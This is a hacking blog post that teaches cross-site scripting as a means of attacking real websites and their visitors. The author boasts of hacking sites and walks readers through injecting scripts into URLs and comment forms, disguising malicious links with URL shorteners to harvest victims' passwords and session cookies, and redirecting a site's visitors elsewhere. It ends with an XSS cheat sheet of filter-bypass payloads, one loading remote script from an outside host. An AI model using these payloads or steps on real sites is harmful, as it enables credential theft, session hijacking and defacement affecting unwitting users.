XSS-CSS script attack

Hai guys today I got a success, that mean hacked a site using only xss/css attack. I feel very happy and want to share the idea to others also..

What is XSS script..? How it Works..?

If You want to know this then go through this..

Xss Script attack

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner.

xss script attack

xss script attack

Xss Script Attack Client Side

Xss script is one of the major vulnerabilty in web applications. Its an injection type attack. We have to inject some malicious scripts inside the web application using any input box. You can put the script in search box, login forms, comment options, contact us forms etc. Where ever you can give any input data try the scripts there, if the script is accepted then you can do any thing using this xss/css script.

Client side attack means it only affects the client side. That when we send the link to the victim and he/she opens the page then our script will execute there, we can stole his/her cookies, session ids, tokens and we can get the creditinals if they input the user name and password in our scripted page.  This is client side attack.

Yeah, now Im going to teach you from the basic.

That mean lets first start from the url script attack, Im going to use an example site, not the original site that I hacked. So first you find the css/xss script vulnerable site and do the experiments below. Dont worry google is there, search the xss vulnerable site there. Read the below steps properly you can definetely hack a site.

Example site : http://www.mobilestores.com

One day I just  open the site to see some new model mobiles for me to purchase, I searched for five minutes at that time I noticed the url. The url comes like this

http://www.mobilestores.com/search.php?mobileid=g123

again when I searched for the next model it changes like

http://www.mobilestores.com/search.php?mobileid=sony231

Im a very lazy person, so what I think is instead of going to several pages and searching the models. Why don’t I put the model number in the url. So I put it in the url my favourite model “Sony Xperia”

http://www.mobilestores.com/search.php?mobileid=Sony Xperia

Actually I enter the model as wrong, But I see that ” Sony Xperia ” this word is reflecting on the page, So Now I think why its showing like this, if its not there why its not showing item not found.

It means that it takes the input from the url. So I planned to change the world “sony xperia” from the url and put it as “I Hacked this site”

http://www.mobilestores.com/search.php?mobileid=Sony Xperia

Oh my god, It is displaying in the site that ” I Hacked this site “. Now my mind starts works little fast. I want to do some thing more. I go to google and search some

xss script (css csript). I got some scripts I just put some basic scripts for you

<script>alert(‘I Wanna Hack You’)</script>
<script>msgbox(‘You Are Hacked’)</script>

I just replaced the word ” sony Xperia” from the url and put my script there.

http://www.mobilestores.com/search.php?mobileid=<script>alert(‘I Wanna Hack You’)</script>

An awesome work by me.. When I open this url its showing one alert box saying ” I Wanna Hack You “

xss script

xss script

Same thing just try a script thats asking for username and password. And and put in the url and send to other users. Definetely they will put their user name and password. And you can now use their creditionals. But remember one thing, don’t send the whole url because it will shows that the script is added in the url. Dont worry about it. Just search is google the url shortner and make your url short and send..

There is lot of xss/css script attack codes in google. Search it and fine more codes.

I hope you people understand. Its just a very basic, If you have any doubt then mail me are put a comment. If you get succeed then go to the below server side XSS/CSS script attack.

XSS server side attack.

Server side attack is quite harmful and its very effective. Because if you inject a script in the server, that page will display to all the peoples who are viewing that page. So you can get login creditionals of lot of peoples specially if you did that in any online shopping sites, then think what will happen. Within an hour you can get more than 500 peoples password, bankl account, pin number etc.. You can get Hell lot of informations.

Now think how you will inject the xss/css script inside the server side. I tried a lot in url, search box, username box, password box, but nothing is worked. I really got very much bored. What a fu…ng  job it is. Days passed I refered to lot of books and sites. One day I remember that, there is some more options for input in web page why dont I try that. That is comment options, or contact us form in the page. I tried to inject the css/xss script to a lot of sites But I got succeed on one site.

http://www.hackerstest.com

xss script attack

xss script attack

I did it. I was very crazy on that day. After a long time I hacked another one site. I just went to comment option and fill the form

name : anonymous
email :aaaa@gmail.com
Comment :  <script>document.location=’http://www.redtube.com’</script&gt;

Now say what will happen when I click the submit button.  When somebody tries to open the site and if it goes to redtube.com. The people get crazy and I think they might been enjoy this.

Any way thanks for a lot buddies to read it upto last, and if any body want the xss script attack vulnerable sites,  comment it below or catch me on indianhackingstuff@gmail.com

Best wishes, Hack on your own way.
Example For XSS Script To Steal The Session Id :

The attacker can compromise the session token by using malicious code or programs running at the client-side. The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. The example in figure 3 uses an XSS attack to show the cookie value of the current session; using the same technique it’s possible to create a specific JavaScript code that will send the cookie to the attacker.

<SCRIPT>alert(document.cookie);</SCRIPT>

xss script attack

xss script attack

I put some scripts below you can try this too..

XSS Cheat Sheet

The ol’e basic:

“><script >alert(document.cookie)</script>

Bypass filter when it strips <script> tags:

%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

“><ScRiPt>alert(document.cookie)</script>

“><<script>alert(document.cookie);//<</script>

foo%00<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

When inside <script> tags:

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

</script><script >alert(document.cookie)</script>

Other XSS that don’t require <script>:

<img src=asdf onerror=alert(document.cookie)>

<BODY ONLOAD=alert(‘XSS’)>

On IE, many tags will accept a style attribute that one could do things with:

http://www.site.com?image=s%22%20style=x:expression(alert(document.cookie))

http://www.site.com?image=s%22%20style=%22background:url(javascript:alert(‘XSS’))

http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29

In FF if you control the content attribute of a refresh meta tag, you can inject a URL that uses the javascript: protocol:

http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>

XSS in JPEGs:

Don’t forget if a user requests a JPEG file in IE directly (not through an embedded <img> tag), then IE will process the contents as HTML if that is what the JPEG contains. This means that we can upload a file with a .jpg extension containing a XSS payload. This works nicely when we have an application that has functionality to upload images and then gets viewed by others. This is common in web mail applications, where one can send an email containing an image attachment, etc. Many applications sanitize HTML attachments to block XSS attacks, but overlook the way IE handles JPEG files.

Example:

HTTP/1.1 200 OK

Date: Sun, 6 May 2007 11:32:35 GMT

Server: Apache

Content-Length: 39

Content-Type: image/jpeg

<script>alert(document.cookie)</script>

About these ads

5 thoughts on “XSS-CSS script attack

  1. It was a nice Article

    Please send me the PPT if u have for your last post for JPEG XSS payload.
    Also provide some more xss csripts for manual validation

    Reply
  2. Pingback: www.hackingstuffs.com/attacks/xss-css-script-attack/comment-page-1/ – Virus Scan Results | OnlinelinkScan

  3. Pingback: www.hackingstuffs.com/attacks/xss-css-script-attack/ – Virus Scan Results | OnlinelinkScan

Comments Are Welcome

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s